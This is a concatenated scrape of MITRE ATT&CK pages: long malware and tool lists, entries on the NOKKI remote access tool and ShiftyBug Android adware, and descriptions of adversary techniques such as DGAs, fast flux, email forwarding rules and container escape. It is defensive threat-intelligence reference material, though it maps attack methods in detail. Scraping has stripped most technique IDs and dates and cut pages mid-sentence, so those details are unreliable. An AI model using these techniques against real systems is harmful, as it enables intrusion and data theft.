Trojan-SMS.AndroidOS.OpFake.a Trojan.Karagany Trojan.Mebromi Truvasys TURNEDUP Twitoor TYPEFRAME UACMe UBoatRAT Umbreon Unknown Logger UPPERCUT Uroburos Ursnif USBStealer Vasport VERMIN ViceLeaker Volgmer WannaCry WEBC Wiarp Windows Credential Editor WINDSHIELD WINERACK Winexe Wingbird WinMM Winnti Wiper WireLurker X-Agent for Android XAgentOSX Xbash Xbot xCmd XcodeGhost XLoader XTunnel Yahoyah YiSpecter yty Zebrocy ZergHelper Zeroaccess ZeroT Zeus Panda ZLib zwShell ZxShell SOFTWARE Overview 1- 3PARA RAT 4H RAT A-B adbupd Adups ADVSTORESHELL Agent Tesla Agent.btz Allwinner Android/Chuli.A ANDROIDOS_ANSERVER.A AndroRAT Arp ASPXSpy Astaroth at AuditCred AutoIt backdoor Azorult BabyShark Backdoor.Oldrea BACKSPACE BADCALL BADNEWS BadPatch Bandook Bankshot BBSRAT BISCUIT Bisonal BITSAdmin BLACKCOFFEE BlackEnergy BONDUPDATER BOOSTWRITE BOOTRASH BrainTest Brave Prince Briba BS BUBBLEWRAP C-D Cachedump CALENDAR Calisto CallMe Cannon Carbanak Carbon Cardinal RAT Catchamas CCBkdr certutil Chaos Charger ChChes Cherry Picker China Chopper CHOPSTICK CloudDuke cmd Cobalt Strike Cobian RAT CoinTicker Comnie ComRAT CORALDECK CORESHELL CosmicDuke CozyCar Crimson CrossRAT DarkComet Daserf DDKONG DealersChoice Dendroid Denis Derusbi Dipsind DOGCALL Dok Downdelph DownPaper DressCode Dridex DroidJack dsquery DualToy Duqu DustySky Dvmap Dyre E-F Ebury Elise ELMER Emissary Emotet Empire Epic esentutl EvilBunny EvilGrab Exaramel for Linux Exaramel for Windows Exodus Expand FakeM FALLCHILL Felismus FELIXROOT Fgdump Final1stspy FinFisher Flame FLASHFLOOD FlawedAmmyy FlawedGrace FlexiSpy FLIPSIDE Forfiles FruitFly FTP Fysbis G-H Gazer GeminiDuke gh0st RAT GLOOXMAIL Gold Dragon GolfSpy Gooligan GravityRAT GreyEnergy GRIFFON gsecdump Gustuff H1N Hacking Team UEFI Rootkit HALFBAKED HAMMERTOSS HAPPYWORK HARDRAIN Havij HAWKBALL hcdLoader HDoor Helminth Hi-Zor HiddenWasp HIDEDRV Hikit HOMEFRY HOPLIGHT HTRAN HTTPBrowser httpclient HummingBad HummingWhale Hydraq HyperBro I-J ifconfig iKitten Impacket InnaputRAT InvisiMole Invoke-PSImage ipconfig ISMInjector Ixeshe Janicab JCry JHUHUGIT JPIN jRAT Judy K-L KARAE Kasidet Kazuar KeyBoy Keydnap KEYMARBLE KeyRaider Koadic Komplex KOMPROGO KONNI Kwampirs LaZagne LightNeuron Linfo Linux Rabbit LockerGoga LoJax LOWBALL Lslsass Lurid M-N Machete MacSpy MailSniper Marcher Matroyshka MazarBOT meek Micropsia Mimikatz MimiPenguin Miner-C MiniDuke MirageFox Mis-Type Misdat Mivast MobileOrder Monokle MoonWind More_eggs Mosquito MURKYTOP Naid NanHaiShu NanoCore NavRAT nbtstat NDiskMonitor Nerex Net Net Crawler NETEAGLE netsh netstat NetTraveler NETWIRE Nidiran njRAT Nltest NOKKI NotCompatible NotPetya O-P OBAD OceanSalt Octopus OLDBAIT OldBoot Olympic Destroyer OnionDuke OopsIE Orz OSInfo OSX/Shlayer OSX_OCEANLOTUS.D OwaAuth P2P ZeuS Pallas Pasam Pass-The-Hash Toolkit Pegasus for Android Pegasus for iOS PHOREAL PinchDuke Ping Pisloader PJApps PLAINTEE PlugX pngdowner PoisonIvy POORAIM PoshC POSHSPY Power Loader PowerDuke POWERSOURCE PowerSploit PowerStallion POWERSTATS POWERTON POWRUNER Prikormka Proton Proxysvc PsExec Psylo Pteranodon PUNCHBUGGY PUNCHTRACK Pupy pwdump Q-R QUADAGENT QuasarRAT RARSTONE RATANKBA RawDisk RawPOS RCSAndroid RDFSNIFFER Reaver RedDrop RedLeaves Reg Regin Remcos Remexi RemoteCMD Remsec Responder Revenge RAT RGDoor Riltok RIPTIDE RobbinHood ROCKBOOT RogueRobin ROKRAT Rotexy route Rover RTM Ruler RuMMS RunningRAT S-T S-Type Sakula SamSam schtasks SDelete SeaDuke Seasalt SEASHARPEE ServHelper Shamoon ShiftyBug SHIPSHAPE SHOTPUT SHUTTERSPEED SimBad Skeleton Key Skygofree SLOWDRIFT Smoke Loader SNUGRIDE Socksbot SOUNDBITE SPACESHIP SpeakUp spwebmember SpyDealer SpyNote RAT sqlmap SQLRat SslMM Starloader Stealth Mango StoneDrill StreamEx Sykipot SynAck Sys Systeminfo T Taidoor Tangelo Tasklist TDTESS TEXTMATE TINYTYPHON TinyZBot Tor TrickBot Trojan-SMS.AndroidOS.Agent.ao Trojan-SMS.AndroidOS.FakeInst.a Trojan-SMS.AndroidOS.OpFake.a Trojan.Karagany Trojan.Mebromi Truvasys TURNEDUP Twitoor TYPEFRAME U-V UACMe UBoatRAT Umbreon Unknown Logger UPPERCUT Uroburos Ursnif USBStealer Vasport VERMIN ViceLeaker Volgmer W-X WannaCry WEBC Wiarp Windows Credential Editor WINDSHIELD WINERACK Winexe Wingbird WinMM Winnti Wiper WireLurker X-Agent for Android XAgentOSX Xbash Xbot xCmd XcodeGhost XLoader XTunnel Y-Z Yahoyah YiSpecter yty Zebrocy ZergHelper Zeroaccess ZeroT Zeus Panda ZLib zwShell ZxShell - Home - Software - NOKKI NOKKI NOKKI is a modular remote access tool. The earliest observed attack using NOKKI was in January 2018. NOKKI has significant code overlap with the KONNI malware family. There is some evidence potentially linking NOKKI to APT37.[1][2] ID: S Type: MALWARE Platforms: Windows Version: 1. Created: 30 January Last Modified: 18 March Version Permalink Live Version ATT&CK® Navigator Layers Enterprise Layer download view Techniques Used Domain ID Name Use Enterprise T . Application Layer Protocol: File Transfer Protocols NOKKI has used FTP for C2 communications.[1] . Application Layer Protocol: Web Protocols NOKKI has used HTTP for C2 communications.[1] Enterprise T . Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder NOKKI has established persistence by writing the payload to the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run.[1] Enterprise T . Data Staged: Local Data Staging NOKKI can collect data from the victim and stage it in LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp.[1] Enterprise T Deobfuscate/Decode Files or Information NOKKI uses a unique, custom de-obfuscation technique.[1] Enterprise T . Indicator Removal on Host: File Deletion NOKKI can delete files to cover tracks.[1] Enterprise T Ingress Tool Transfer NOKKI has downloaded a remote module for execution.[1] Enterprise T . Input Capture: Credential API Hooking NOKKI uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.[1] Enterprise T . Masquerading: Match Legitimate Name or Location NOKKI is written to %LOCALAPPDATA%\MicroSoft Updatea\svServiceUpdate.exe prior being executed in a new process in an apparent attempt to masquerade as a legitimate folder and file.[1] Enterprise T Obfuscated Files or Information NOKKI uses Base64 encoding for strings.[1] Enterprise T . Signed Binary Proxy Execution: Rundll NOKKI has used rundll32 for execution.[1] Enterprise T System Information Discovery NOKKI can gather information on drives and the operating system on the victim’s machine.[1] Enterprise T System Network Configuration Discovery NOKKI can gather information on the victim IP address.[1] Enterprise T System Owner/User Discovery NOKKI can collect the username from the victim’s machine.[1] Enterprise T System Time Discovery NOKKI can collect the current timestamp of the victim's machine.[1] References - Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018. - Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018. × load more results
versions_v7-beta_software_S0353.txt
to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control. . Fast Flux DNS Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record. . Domain Generation Algorithms Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions. . DNS Calculation Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel. T Email Collection Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. . Local Email Collection Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files. . Remote Email Collection Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as MailSniper can be used to automate searches for specific keywords. . Email Forwarding Rule Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations. Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators. Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes. T Encrypted Channel Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files. . Symmetric Cryptography Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4. . Asymmetric Cryptography Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal. T Endpoint Denial of Service Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion. . OS Exhaustion Flood Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes. . Service Exhaustion Flood Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well. Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. . Application Exhaustion Flood Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. . Application or System Exploitation Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition. T Escape to Host Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment. T Establish Accounts Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity. . Social Media Accounts Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. . Email Accounts Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct Phishing for Information or Phishing. Adversaries may also take steps to cultivate a persona around the email account, such as through use of Social Media Accounts, to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: Domains). . Cloud Accounts Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers. T Event Triggered Execution Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events. . Change Default File Association Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in
versions_v12_techniques_enterprise.txt
Currently viewing ATT&CK v7.0-beta which was live between March 31, 2020 and July 7, 2020. Learn more about the versioning system or see the live site. You are currently viewing the sub-techniques beta. Take a tour, read the blog post or release notes, or see the non-beta version of the site. SOFTWARE Overview 3PARA RAT 4H RAT adbupd Adups ADVSTORESHELL Agent Tesla Agent.btz Allwinner Android/Chuli.A ANDROIDOS_ANSERVER.A AndroRAT Arp ASPXSpy Astaroth at AuditCred AutoIt backdoor Azorult BabyShark Backdoor.Oldrea BACKSPACE BADCALL BADNEWS BadPatch Bandook Bankshot BBSRAT BISCUIT Bisonal BITSAdmin BLACKCOFFEE BlackEnergy BONDUPDATER BOOSTWRITE BOOTRASH BrainTest Brave Prince Briba BS BUBBLEWRAP Cachedump CALENDAR Calisto CallMe Cannon Carbanak Carbon Cardinal RAT Catchamas CCBkdr certutil Chaos Charger ChChes Cherry Picker China Chopper CHOPSTICK CloudDuke cmd Cobalt Strike Cobian RAT CoinTicker Comnie ComRAT CORALDECK CORESHELL CosmicDuke CozyCar Crimson CrossRAT DarkComet Daserf DDKONG DealersChoice Dendroid Denis Derusbi Dipsind DOGCALL Dok Downdelph DownPaper DressCode Dridex DroidJack dsquery DualToy Duqu DustySky Dvmap Dyre Ebury Elise ELMER Emissary Emotet Empire Epic esentutl EvilBunny EvilGrab Exaramel for Linux Exaramel for Windows Exodus Expand FakeM FALLCHILL Felismus FELIXROOT Fgdump Final1stspy FinFisher Flame FLASHFLOOD FlawedAmmyy FlawedGrace FlexiSpy FLIPSIDE Forfiles FruitFly FTP Fysbis Gazer GeminiDuke gh0st RAT GLOOXMAIL Gold Dragon GolfSpy Gooligan GravityRAT GreyEnergy GRIFFON gsecdump Gustuff H1N Hacking Team UEFI Rootkit HALFBAKED HAMMERTOSS HAPPYWORK HARDRAIN Havij HAWKBALL hcdLoader HDoor Helminth Hi-Zor HiddenWasp HIDEDRV Hikit HOMEFRY HOPLIGHT HTRAN HTTPBrowser httpclient HummingBad HummingWhale Hydraq HyperBro ifconfig iKitten Impacket InnaputRAT InvisiMole Invoke-PSImage ipconfig ISMInjector Ixeshe Janicab JCry JHUHUGIT JPIN jRAT Judy KARAE Kasidet Kazuar KeyBoy Keydnap KEYMARBLE KeyRaider Koadic Komplex KOMPROGO KONNI Kwampirs LaZagne LightNeuron Linfo Linux Rabbit LockerGoga LoJax LOWBALL Lslsass Lurid Machete MacSpy MailSniper Marcher Matroyshka MazarBOT meek Micropsia Mimikatz MimiPenguin Miner-C MiniDuke MirageFox Mis-Type Misdat Mivast MobileOrder Monokle MoonWind More_eggs Mosquito MURKYTOP Naid NanHaiShu NanoCore NavRAT nbtstat NDiskMonitor Nerex Net Net Crawler NETEAGLE netsh netstat NetTraveler NETWIRE Nidiran njRAT Nltest NOKKI NotCompatible NotPetya OBAD OceanSalt Octopus OLDBAIT OldBoot Olympic Destroyer OnionDuke OopsIE Orz OSInfo OSX/Shlayer OSX_OCEANLOTUS.D OwaAuth P2P ZeuS Pallas Pasam Pass-The-Hash Toolkit Pegasus for Android Pegasus for iOS PHOREAL PinchDuke Ping Pisloader PJApps PLAINTEE PlugX pngdowner PoisonIvy POORAIM PoshC POSHSPY Power Loader PowerDuke POWERSOURCE PowerSploit PowerStallion POWERSTATS POWERTON POWRUNER Prikormka Proton Proxysvc PsExec Psylo Pteranodon PUNCHBUGGY PUNCHTRACK Pupy pwdump QUADAGENT QuasarRAT RARSTONE RATANKBA RawDisk RawPOS RCSAndroid RDFSNIFFER Reaver RedDrop RedLeaves Reg Regin Remcos Remexi RemoteCMD Remsec Responder Revenge RAT RGDoor Riltok RIPTIDE RobbinHood ROCKBOOT RogueRobin ROKRAT Rotexy route Rover RTM Ruler RuMMS RunningRAT S-Type Sakula SamSam schtasks SDelete SeaDuke Seasalt SEASHARPEE ServHelper Shamoon ShiftyBug SHIPSHAPE SHOTPUT SHUTTERSPEED SimBad Skeleton Key Skygofree SLOWDRIFT Smoke Loader SNUGRIDE Socksbot SOUNDBITE SPACESHIP SpeakUp spwebmember SpyDealer SpyNote RAT sqlmap SQLRat SslMM Starloader Stealth Mango StoneDrill StreamEx Sykipot SynAck Sys Systeminfo T Taidoor Tangelo Tasklist TDTESS TEXTMATE TINYTYPHON TinyZBot Tor TrickBot Trojan-SMS.AndroidOS.Agent.ao Trojan-SMS.AndroidOS.FakeInst.a Trojan-SMS.AndroidOS.OpFake.a Trojan.Karagany Trojan.Mebromi Truvasys TURNEDUP Twitoor TYPEFRAME UACMe UBoatRAT Umbreon Unknown Logger UPPERCUT Uroburos Ursnif USBStealer Vasport VERMIN ViceLeaker Volgmer WannaCry WEBC Wiarp Windows Credential Editor WINDSHIELD WINERACK Winexe Wingbird WinMM Winnti Wiper WireLurker X-Agent for Android XAgentOSX Xbash Xbot xCmd XcodeGhost XLoader XTunnel Yahoyah YiSpecter yty Zebrocy ZergHelper Zeroaccess ZeroT Zeus Panda ZLib zwShell ZxShell SOFTWARE Overview 1- 3PARA RAT 4H RAT A-B adbupd Adups ADVSTORESHELL Agent Tesla Agent.btz Allwinner Android/Chuli.A ANDROIDOS_ANSERVER.A AndroRAT Arp ASPXSpy Astaroth at AuditCred AutoIt backdoor Azorult BabyShark Backdoor.Oldrea BACKSPACE BADCALL BADNEWS BadPatch Bandook Bankshot BBSRAT BISCUIT Bisonal BITSAdmin BLACKCOFFEE BlackEnergy BONDUPDATER BOOSTWRITE BOOTRASH BrainTest Brave Prince Briba BS BUBBLEWRAP C-D Cachedump CALENDAR Calisto CallMe Cannon Carbanak Carbon Cardinal RAT Catchamas CCBkdr certutil Chaos Charger ChChes Cherry Picker China Chopper CHOPSTICK CloudDuke cmd Cobalt Strike Cobian RAT CoinTicker Comnie ComRAT CORALDECK CORESHELL CosmicDuke CozyCar Crimson CrossRAT DarkComet Daserf DDKONG DealersChoice Dendroid Denis Derusbi Dipsind DOGCALL Dok Downdelph DownPaper DressCode Dridex DroidJack dsquery DualToy Duqu DustySky Dvmap Dyre E-F Ebury Elise ELMER Emissary Emotet Empire Epic esentutl EvilBunny EvilGrab Exaramel for Linux Exaramel for Windows Exodus Expand FakeM FALLCHILL Felismus FELIXROOT Fgdump Final1stspy FinFisher Flame FLASHFLOOD FlawedAmmyy FlawedGrace FlexiSpy FLIPSIDE Forfiles FruitFly FTP Fysbis G-H Gazer GeminiDuke gh0st RAT GLOOXMAIL Gold Dragon GolfSpy Gooligan GravityRAT GreyEnergy GRIFFON gsecdump Gustuff H1N Hacking Team UEFI Rootkit HALFBAKED HAMMERTOSS HAPPYWORK HARDRAIN Havij HAWKBALL hcdLoader HDoor Helminth Hi-Zor HiddenWasp HIDEDRV Hikit HOMEFRY HOPLIGHT HTRAN HTTPBrowser httpclient HummingBad HummingWhale Hydraq HyperBro I-J ifconfig iKitten Impacket InnaputRAT InvisiMole Invoke-PSImage ipconfig ISMInjector Ixeshe Janicab JCry JHUHUGIT JPIN jRAT Judy K-L KARAE Kasidet Kazuar KeyBoy Keydnap KEYMARBLE KeyRaider Koadic Komplex KOMPROGO KONNI Kwampirs LaZagne LightNeuron Linfo Linux Rabbit LockerGoga LoJax LOWBALL Lslsass Lurid M-N Machete MacSpy MailSniper Marcher Matroyshka MazarBOT meek Micropsia Mimikatz MimiPenguin Miner-C MiniDuke MirageFox Mis-Type Misdat Mivast MobileOrder Monokle MoonWind More_eggs Mosquito MURKYTOP Naid NanHaiShu NanoCore NavRAT nbtstat NDiskMonitor Nerex Net Net Crawler NETEAGLE netsh netstat NetTraveler NETWIRE Nidiran njRAT Nltest NOKKI NotCompatible NotPetya O-P OBAD OceanSalt Octopus OLDBAIT OldBoot Olympic Destroyer OnionDuke OopsIE Orz OSInfo OSX/Shlayer OSX_OCEANLOTUS.D OwaAuth P2P ZeuS Pallas Pasam Pass-The-Hash Toolkit Pegasus for Android Pegasus for iOS PHOREAL PinchDuke Ping Pisloader PJApps PLAINTEE PlugX pngdowner PoisonIvy POORAIM PoshC POSHSPY Power Loader PowerDuke POWERSOURCE PowerSploit PowerStallion POWERSTATS POWERTON POWRUNER Prikormka Proton Proxysvc PsExec Psylo Pteranodon PUNCHBUGGY PUNCHTRACK Pupy pwdump Q-R QUADAGENT QuasarRAT RARSTONE RATANKBA RawDisk RawPOS RCSAndroid RDFSNIFFER Reaver RedDrop RedLeaves Reg Regin Remcos Remexi RemoteCMD Remsec Responder Revenge RAT RGDoor Riltok RIPTIDE RobbinHood ROCKBOOT RogueRobin ROKRAT Rotexy route Rover RTM Ruler RuMMS RunningRAT S-T S-Type Sakula SamSam schtasks SDelete SeaDuke Seasalt SEASHARPEE ServHelper Shamoon ShiftyBug SHIPSHAPE SHOTPUT SHUTTERSPEED SimBad Skeleton Key Skygofree SLOWDRIFT Smoke Loader SNUGRIDE Socksbot SOUNDBITE SPACESHIP SpeakUp spwebmember SpyDealer SpyNote RAT sqlmap SQLRat SslMM Starloader Stealth Mango StoneDrill StreamEx Sykipot SynAck Sys Systeminfo T Taidoor Tangelo Tasklist TDTESS TEXTMATE TINYTYPHON TinyZBot Tor TrickBot Trojan-SMS.AndroidOS.Agent.ao Trojan-SMS.AndroidOS.FakeInst.a Trojan-SMS.AndroidOS.OpFake.a Trojan.Karagany Trojan.Mebromi Truvasys TURNEDUP Twitoor TYPEFRAME U-V UACMe UBoatRAT Umbreon Unknown Logger UPPERCUT Uroburos Ursnif USBStealer Vasport VERMIN ViceLeaker Volgmer W-X WannaCry WEBC Wiarp Windows Credential Editor WINDSHIELD WINERACK Winexe Wingbird WinMM Winnti Wiper WireLurker X-Agent for Android XAgentOSX Xbash Xbot xCmd XcodeGhost XLoader XTunnel Y-Z Yahoyah YiSpecter yty Zebrocy ZergHelper Zeroaccess ZeroT Zeus Panda ZLib zwShell ZxShell - Home - Software - ShiftyBug ShiftyBug ShiftyBug is an auto-rooting adware family of malware for Android. The family is very similar to the other Android families known as Shedun, Shuanet, Kemoge, though it is not believed all the families were created by the same group. [1] ID: S Type: MALWARE Platforms: Android Version: 1. Created: 25 October Last Modified: 11 December Version Permalink Live Version ATT&CK® Navigator Layers Mobile Layer download view Techniques Used Domain ID Name Use Mobile T Exploit OS Vulnerability ShiftyBug is packed with at least eight publicly available exploits that can perform rooting.[1] Mobile T Modify System Partition ShiftyBug is auto-rooting adware that embeds itself as a system application, making it nearly impossible to remove.[1] References - Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. Retrieved December 21, 2016. × load more results
versions_v7-beta_software_S0294.txt
Hooking Man-in-the-Middle LLMNR/NBT-NS Poisoning and SMB Relay ARP Cache Poisoning Modify Authentication Process Domain Controller Authentication Password Filter DLL Pluggable Authentication Modules Network Device Authentication Network Sniffing OS Credential Dumping LSASS Memory Security Account Manager NTDS LSA Secrets Cached Domain Credentials DCSync Proc Filesystem /etc/passwd and /etc/shadow Steal Application Access Token Steal or Forge Kerberos Tickets Golden Ticket Silver Ticket Kerberoasting AS-REP Roasting Steal Web Session Cookie Two-Factor Authentication Interception Unsecured Credentials Credentials In Files Credentials in Registry Bash History Private Keys Cloud Instance Metadata API Group Policy Preferences Container API Discovery Account Discovery Local Account Domain Account Email Account Cloud Account Application Window Discovery Browser Bookmark Discovery Cloud Infrastructure Discovery Cloud Service Dashboard Cloud Service Discovery Container and Resource Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Local Groups Domain Groups Cloud Groups Process Discovery Query Registry Remote System Discovery Software Discovery Security Software Discovery System Information Discovery System Location Discovery System Network Configuration Discovery Internet Connection Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion System Checks User Activity Based Checks Time Based Evasion Lateral Movement Exploitation of Remote Services Internal Spearphishing Lateral Tool Transfer Remote Service Session Hijacking SSH Hijacking RDP Hijacking Remote Services Remote Desktop Protocol SMB/Windows Admin Shares Distributed Component Object Model SSH VNC Windows Remote Management Replication Through Removable Media Software Deployment Tools Taint Shared Content Use Alternate Authentication Material Application Access Token Pass the Hash Pass the Ticket Web Session Cookie Collection Archive Collected Data Archive via Utility Archive via Library Archive via Custom Method Audio Capture Automated Collection Clipboard Data Data from Cloud Storage Object Data from Configuration Repository SNMP (MIB Dump) Network Device Configuration Dump Data from Information Repositories Confluence Sharepoint Data from Local System Data from Network Shared Drive Data from Removable Media Data Staged Local Data Staging Remote Data Staging Email Collection Local Email Collection Remote Email Collection Email Forwarding Rule Input Capture Keylogging GUI Input Capture Web Portal Capture Credential API Hooking Man in the Browser Man-in-the-Middle LLMNR/NBT-NS Poisoning and SMB Relay ARP Cache Poisoning Screen Capture Video Capture Command and Control Application Layer Protocol Web Protocols File Transfer Protocols Mail Protocols DNS Communication Through Removable Media Data Encoding Standard Encoding Non-Standard Encoding Data Obfuscation Junk Data Steganography Protocol Impersonation Dynamic Resolution Fast Flux DNS Domain Generation Algorithms DNS Calculation Encrypted Channel Symmetric Cryptography Asymmetric Cryptography Fallback Channels Ingress Tool Transfer Multi-Stage Channels Non-Application Layer Protocol Non-Standard Port Protocol Tunneling Proxy Internal Proxy External Proxy Multi-hop Proxy Domain Fronting Remote Access Software Traffic Signaling Port Knocking Web Service Dead Drop Resolver Bidirectional Communication One-Way Communication Exfiltration Automated Exfiltration Traffic Duplication Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Symmetric Encrypted Non-C2 Protocol Exfiltration Over Asymmetric Encrypted Non-C2 Protocol Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Exfiltration Over C2 Channel Exfiltration Over Other Network Medium Exfiltration Over Bluetooth Exfiltration Over Physical Medium Exfiltration over USB Exfiltration Over Web Service Exfiltration to Code Repository Exfiltration to Cloud Storage Scheduled Transfer Transfer Data to Cloud Account Impact Account Access Removal Data Destruction Data Encrypted for Impact Data Manipulation Stored Data Manipulation Transmitted Data Manipulation Runtime Data Manipulation Defacement Internal Defacement External Defacement Disk Wipe Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service OS Exhaustion Flood Service Exhaustion Flood Application Exhaustion Flood Application or System Exploitation Firmware Corruption Inhibit System Recovery Network Denial of Service Direct Network Flood Reflection Amplification Resource Hijacking Service Stop System Shutdown/Reboot Mobile Initial Access Deliver Malicious App via Authorized App Store Deliver Malicious App via Other Means Drive-by Compromise Exploit via Charging Station or PC Exploit via Radio Interfaces Install Insecure or Malicious Configuration Lockscreen Bypass Masquerade as Legitimate Application Supply Chain Compromise Execution Broadcast Receivers Command-Line Interface Native Code Scheduled Task/Job Persistence Broadcast Receivers Code Injection Compromise Application Executable Foreground Persistence Modify Cached Executable Code Modify OS Kernel or Boot Partition Modify System Partition Modify Trusted Execution Environment Scheduled Task/Job Privilege Escalation Code Injection Device Administrator Permissions Exploit OS Vulnerability Exploit TEE Vulnerability Defense Evasion Application Discovery Code Injection Delete Device Data Device Lockout Disguise Root/Jailbreak Indicators Download New Code at Runtime Evade Analysis Environment Geofencing Input Injection Install Insecure or Malicious Configuration Masquerade as Legitimate Application Modify OS Kernel or Boot Partition Modify System Partition Modify Trusted Execution Environment Native Code Obfuscated Files or Information Proxy Through Victim Suppress Application Icon Uninstall Malicious Application Credential Access Access Notifications Access Sensitive Data in Device Logs Access Stored Application Data Capture Clipboard Data Capture SMS Messages Exploit TEE Vulnerability Input Capture Input Prompt Keychain Network Traffic Capture or Redirection URI Hijacking Discovery Application Discovery Evade Analysis Environment File and Directory Discovery Location Tracking Network Service Scanning Process Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery Lateral Movement Attack PC via USB Connection Exploit Enterprise Resources Collection Access Calendar Entries Access Call Log Access Contact List Access Notifications Access Sensitive Data in Device Logs Access Stored Application Data Capture Audio Capture Camera Capture Clipboard Data Capture SMS Messages Data from Local System Foreground Persistence Input Capture Location Tracking Network Information Discovery Network Traffic Capture or Redirection Screen Capture Command and Control Alternate Network Mediums Commonly Used Port Domain Generation Algorithms Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Uncommonly Used Port Web Service Exfiltration Alternate Network Mediums Commonly Used Port Data Encrypted Standard 